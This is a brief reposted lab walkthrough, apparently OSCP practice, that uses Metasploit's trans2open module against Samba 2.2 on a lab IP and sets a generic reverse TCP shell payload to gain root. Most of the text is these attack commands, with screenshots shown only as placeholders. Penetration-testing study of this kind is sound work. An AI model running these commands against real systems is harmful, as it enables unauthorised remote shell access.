OSCP Security Technology - Gaining Root with Metasploit

2021/7/7 9:06:41

本文主要是介绍OSCP Security Technology - Gaining Root with Metasploit,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

OSCP Security Technology - Gaining Root with Metasploit

Analysis nmap scanning result.

image-20210707075501995

searchsploit samba 2.2 

image-20210707080027869

msfconsole
search trans2open
use exploit/linux/samba/trans2open
show options

image-20210707080550750

set rhost 192.168.2.28
show targets
exploit

image-20210707081352600

We need change the payload setting.

show options
set payload generic/shell_reverse_tcp
exploit

image-20210707081648763

image-20210707081948209



这篇关于OSCP Security Technology - Gaining Root with Metasploit的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程